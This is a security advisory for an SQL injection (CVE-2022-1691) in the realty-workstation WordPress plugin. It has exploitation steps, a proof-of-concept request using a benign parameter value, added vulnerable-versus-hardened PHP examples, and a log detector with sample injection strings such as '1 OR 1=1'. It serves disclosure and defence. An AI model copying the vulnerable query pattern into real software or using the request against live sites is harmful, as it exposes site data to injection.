realty-workstation 1.0.6 WordPress plugin SQL injection
Vulnerability Metadata
Key | Value |
---|---|
Date of Disclosure | May 09 2022 |
Affected Software | realty-workstation |
Affected Software Type | WordPress plugin |
Version | 1.0.6 |
Weakness | SQL Injection |
CWE ID | CWE-89 |
CVE ID | CVE-2022-1691 |
CVSS 3.x Base Score | 4.9 |
CVSS 2.0 Base Score | 4.0 |
Reporter | Daniel Krohmer, Shi Chen |
Reporter Contact | daniel.krohmer@iese.fraunhofer.de |
Link to Affected Software | https://wordpress.org/plugins/realty-workstation |
Link to Vulnerability DB | https://nvd.nist.gov/vuln/detail/CVE-2022-1691 |
Vulnerability Description
The trans_edit query parameter in realty-workstation 1.0.6 is vulnerable to SQL injection. An existing (authenticated) agent may abuse the Edit functionality of the plugin to craft a malicious GET request in which the value of trans_edit reaches the database query unsanitized.
Exploitation Guide
1. Log in as an admin user.
2. Go to Realty Workstation and click on Agents.
3. Add a new agent by clicking on Add New Agent.
4. Provide arbitrary user information, then click on Save.
5. Go to Realty Workstation and then click on Agent Transactions.
6. Fill in some arbitrary data and click on Save.
7. As an unauthenticated user, visit the main blog page and go to the Workstation.
8. Sign in with the credentials of the previously created agent.
9. Click on Edit in the agent view of the workstation.

Clicking the Edit button triggers the vulnerable request; trans_edit is the vulnerable query parameter.
A proof-of-concept request is given under Exploit Payload below.
Important: the exploit works with both transactions=open_agent_transactions and transactions=open_transactions.
In the code, the vulnerability is triggered by the unsanitized user input of trans_edit at line 190 in ./public/template/agent-page.php. The final database query is executed at line 30 in ./cn_package/includes/class-workstation-query.php.
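The pattern the advisory describes, shown as an added illustration beside its hardened form. This is not code from realty-workstation: the function names, the table name rw_example_transactions, the column names id and agent_id, and the assumption that an agent is a logged-in WordPress user are all placeholders chosen for the example. Only the parameter name trans_edit and the "raw $_GET value reaches the query" defect come from the advisory. The snippet expects to run inside WordPress ($wpdb, absint(), wp_unslash(), get_current_user_id()).

```php
<?php
// Added example, not the plugin's code. Table/column names and the
// agent-to-user mapping are assumptions made for illustration only.

/**
 * Vulnerable pattern (CWE-89): the raw trans_edit value is interpolated
 * into the SQL string, so anything other than an integer changes the query.
 */
function rw_example_load_transaction_vulnerable() {
    global $wpdb;

    $trans_edit = isset( $_GET['trans_edit'] ) ? $_GET['trans_edit'] : '';
    $table      = $wpdb->prefix . 'rw_example_transactions'; // assumed table

    // DO NOT USE: user input concatenated straight into SQL.
    $sql = "SELECT * FROM {$table} WHERE id = {$trans_edit}";

    return $wpdb->get_row( $sql, ARRAY_A );
}

/**
 * Hardened form: the id is coerced to a non-negative integer, bound with a
 * %d placeholder through $wpdb->prepare(), and the row is additionally
 * scoped to the current agent so one agent cannot edit another's record.
 */
function rw_example_load_transaction_hardened() {
    global $wpdb;

    if ( ! isset( $_GET['trans_edit'] ) ) {
        return null;
    }

    // absint() returns 0 for anything that is not a non-negative integer,
    // so "1 OR 1=1", "1'" or similar never reach the query text.
    $trans_id = absint( wp_unslash( $_GET['trans_edit'] ) );
    if ( 0 === $trans_id ) {
        return null;
    }

    $table = $wpdb->prefix . 'rw_example_transactions'; // assumed table

    // The table name is a trusted constant; only the values are bound.
    // agent_id = current user is an assumption about how agents are stored.
    $sql = $wpdb->prepare(
        "SELECT * FROM {$table} WHERE id = %d AND agent_id = %d",
        $trans_id,
        get_current_user_id()
    );

    return $wpdb->get_row( $sql, ARRAY_A );
}
```

The integer cast alone closes the injection; the agent_id predicate is the extra check a reviewer would ask for, because a parameterised query still lets an agent open any transaction id if the row is not tied to the requesting account.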
Exploit Payload
Please note that the cookies (and any nonces) in the request below belong to the test installation and need to be replaced with the values of your own session, otherwise the request will not be accepted. The request is shown with the legitimate value trans_edit=1; the advisory does not publish an injection string, only the parameter through which the injection is reached. The SQL injection can be triggered by sending the request below.
GET /?page_id=286&transactions=open_transactions&trans_edit=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/?page_id=286&transactions=open_agent_transactions&trans_edit=1
Cookie: PHPSESSID=rmv93d526mhc8cvjf72hdaacrk; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651756511%7CcItznI8IWbEEnPDRsizkJZkrYojSFqzr2ySRUf1DEys%7C27bbb08bd6cc4106de1fd37daf991abff108f78ed51facd7e7d37c86c40b901a; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651583711
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
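A detection check for the request above, added here as an example and not part of the advisory: the legitimate Edit click sends trans_edit as a plain integer, so any request in which the parameter carries a non-numeric value is worth flagging in web-server access logs. The log lines are constructed for the example and the non-integer values in them are illustrative tampering, not a confirmed working payload against the plugin.

```php
<?php
// Added example, not part of the advisory. Parses combined-format access
// log lines and reports requests whose trans_edit value is not an integer.

/**
 * Returns the log lines (with the offending value) where trans_edit is
 * present but is not a plain non-negative integer.
 */
function rw_find_suspicious_trans_edit( array $lines ): array {
    $hits = [];

    foreach ( $lines as $line ) {
        // Pull the request target out of "METHOD /target HTTP/x.y".
        if ( ! preg_match( '/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m ) ) {
            continue;
        }

        $query = parse_url( $m[1], PHP_URL_QUERY );
        if ( ! $query ) {
            continue;
        }

        // parse_str() URL-decodes, so "1%27" becomes "1'".
        parse_str( $query, $params );
        if ( ! isset( $params['trans_edit'] ) || is_array( $params['trans_edit'] ) ) {
            continue;
        }

        $value = $params['trans_edit'];
        if ( ! preg_match( '/^\d+$/', $value ) ) {
            $hits[] = [ 'line' => $line, 'trans_edit' => $value ];
        }
    }

    return $hits;
}

// Constructed sample log lines: one benign request and two tampered ones.
$sample = [
    '10.0.0.5 - - [09/May/2022:10:00:01 +0000] "GET /?page_id=286&transactions=open_transactions&trans_edit=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [09/May/2022:10:00:07 +0000] "GET /?page_id=286&transactions=open_agent_transactions&trans_edit=1%20OR%201%3D1 HTTP/1.1" 200 9120',
    '10.0.0.9 - - [09/May/2022:10:00:09 +0000] "GET /?page_id=286&transactions=open_transactions&trans_edit=1%27 HTTP/1.1" 500 312',
];

foreach ( rw_find_suspicious_trans_edit( $sample ) as $hit ) {
    printf( "suspicious trans_edit=%s\n  %s\n", $hit['trans_edit'], $hit['line'] );
}
```

Run with `php detect.php`; the first sample line is silent and the two tampered lines are reported. The same rule (trans_edit present and not matching `^\d+$`) can be expressed directly in a WAF or SIEM query, since it does not depend on any particular injection string.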